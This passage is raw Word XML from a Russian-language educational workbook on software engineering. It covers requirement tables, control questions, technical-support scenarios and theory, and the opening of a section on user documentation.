    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="708"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Заполнить таблицу:</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45"/>
        <w:gridCol w:w="4654"/>
        <w:gridCol w:w="2547"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidTr="00F63AE5">
        <w:trPr>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610"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b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Вид требований</w:t>
            </w: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b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Параметры</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="270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b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Значение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidTr="00F63AE5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610" w:type="dxa"/>
            <w:vMerge w:val="restart"/>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sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Функциональные характеристики</w:t>
            </w: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lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>выполняемых функций</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список входных данных</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список выходных данных</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время для ввода параметров</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2610" w:type="dxa"/>
            <w:vMerge w:val="restart"/>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sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Надежность</w:t>
            </w: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lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>требования к ОС</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 xml:space="preserve">методы контроля входной и выходной информации </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время восстановления после отказа</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2610" w:type="dxa"/>
            <w:vMerge w:val="restart"/>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sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Условия эксплуатации</w:t>
            </w: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требования к типам носителей</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необходимую температуру окружающего воздуха</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относительную влажность</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2610"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sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Состав и параметры технических средств</w:t>
            </w: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sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>перечень технических средств (компьютер, сеть, сетевое оборудование) с указанием их основных технических характеристик</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2610" w:type="dxa"/>
            <w:vMerge w:val="restart"/>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sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Информационная и программная совместимость</w:t>
            </w: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описание метода решения поставленных задач</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 xml:space="preserve">языка программирования </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10"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>программных средств, используемых программой</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2610" w:type="dxa"/>
            <w:vMerge w:val="restart"/>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a1"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="708"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Технико-экономические показатели</w:t>
            </w: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ориентировочная экономическая эффективность</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предполагаемая годовая потребность</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r w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidTr="00F63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63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00824CBE">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4959" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00824CBE">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>экономические преимущества разработки по сравнению с аналогами</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2709" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00824CBE">
            <w:pPr>
              <w:pStyle w:val="a1"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="708"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Сформировать структуру функций программного средства.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Сформировать на основе структуры функций схему взаимодействия модулей формируемого программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="000767EE">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Контрольные вопросы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="000767EE">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="714" w:hanging="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Какие стадии разработки ПО существуют?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="000767EE">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="714" w:hanging="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Опишите все стадии проектирования ПО.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="000767EE">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="714" w:hanging="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Какие требования к программному обеспечению предъявляются?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="000767EE">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="714" w:hanging="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Дайте характеристику к каждому требованию.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00F63AE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="190"/>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00F63AE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 3. Составить инструкцию (описание) по решениию одной из ситуаций:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00F63AE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00F63AE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задача №1 - У меня не получается запустить программное обеспечение.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00F63AE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задача №2 - Во время работы было предложено обновить программное обеспечение. После обновления я не могу зайти под своим логином.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00F63AE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задача №3 - После обновления программа не «видит» сеть.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00F63AE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Задача №4 - При установке программы у меня не хватает прав.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00F63AE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет должен содержать рекомендации по установке и примерный текст консультации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00F63AE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 4. Описание услуг технической поддержки программного обеспечения отраслевой направленности</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00F63AE5">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Краткое теоретическое обоснование:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00F63AE5">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Техническая поддержка или техподдержка - собирательное понятие, обобщающее собой и охватывающее множество услуг, посредством которых предприятия и организации обеспечивают помощь пользователям технологичных продуктов и услуг, например таких, как мобильные и стационарные телефоны, телевизоры, компьютеры, программное обеспечение, а также других электронных и механических товаров и услуг. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00F63AE5">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В целом, техническая поддержка служит попыткам помочь конкретным пользователям решать возникающие конкретные проблемы с продуктом и его использованием, нежели задачи, связанные с обучением, индивидуальной настройкой или другими услугами поддержки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00F63AE5">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Большинство компаний предлагают техническую поддержку к продуктам, которые они предоставляют и продают, и делают это либо бесплатно, либо за дополнительную плату. Техническая поддержка предоставляется, как правило, по телефону, через интернет, по электронной почте, через онлайн-сервисы поддержки на веб-сайте или через инструменты, посредством которых пользователи могут зарегистрировать заявку или создать инцидент и затем проследить их судьбу - историю состояний/этапов е</w:t>
      </w:r>
      <w:r w:rsidR="00776B59" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или его решения. Большие организации часто имеют собственную, внутреннюю службу технической поддержки, которая помогает персоналу решать возникающие проблемы, носящие технический характер. Также, хорошим источником бесплатной технической поддержки явлется интернет, где опытные пользователи на различных форумах и сайтах могут что-нибудь посоветовать или помочь в решении или поделиться своим опытом решения таких же или похожих проблем. Также, некоторые компании, предоставляют премиальную техническую поддержку за дополнительную плату.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00F63AE5">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Говоря о технической поддержке могут иметь в виду и т.н. helpdesk - досл. с англ. «стол помощи», и service desk - досл. с англ. «стол услуги» и поддержку продукта или услуги, и поддержку клиента, и систему работы с инцидентами, заявками и проблемами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00F63AE5">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00F63AE5">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое техподдержка?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00F63AE5">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Какие функции выполняет техподдержка?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63AE5" w:rsidRPr="00617AC0" w:rsidRDefault="00F63AE5" w:rsidP="00F63AE5">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Какие услуги должна оказывать техподдержка?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00824CBE" w:rsidRPr="00617AC0" w:rsidRDefault="00824CBE" w:rsidP="00F63AE5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание 5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Составление пользовательской документации</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Эксплуатационная документация должна обеспечивать отчуждаемость ПС от их первичных разработчиков, адекватно отражать требуемое внешнее качество и качество в использовании, а также возможность освоения и эффективного применения ПС достаточно квалифицированными специалистами. Она применяется непосредственными пользователями в соответствии с функциональным назначением ПС, а также заказчиками, покупателямии поставщиками программных продуктов. Состав этой документации формируется с использованием части технологических документов с учетом требований заказчиков или потенциальных пользователей ПС.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Содержание эксплуатационных документов должно предотвращать или исключать возможность некорректного использования комплекса программ пользователями за пределами условий эксплуатации, при которых поставщиком гарантируются требуемые и утвержденные характеристики качества функционирования ПС. При формировании эксплуатационных документов ПС, кроме базовых стандартов жизненного цикла могут использоваться ряд ведомственных нормативных документов и фирменных руководств.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="008333B2">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Эксплуатационная документация включает в себя:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="850" w:hanging="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Документация администрирования при применении ПС;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008333B2" w:rsidRPr="00617AC0" w:rsidRDefault="008333B2" w:rsidP="00CA4559">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="850" w:hanging="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
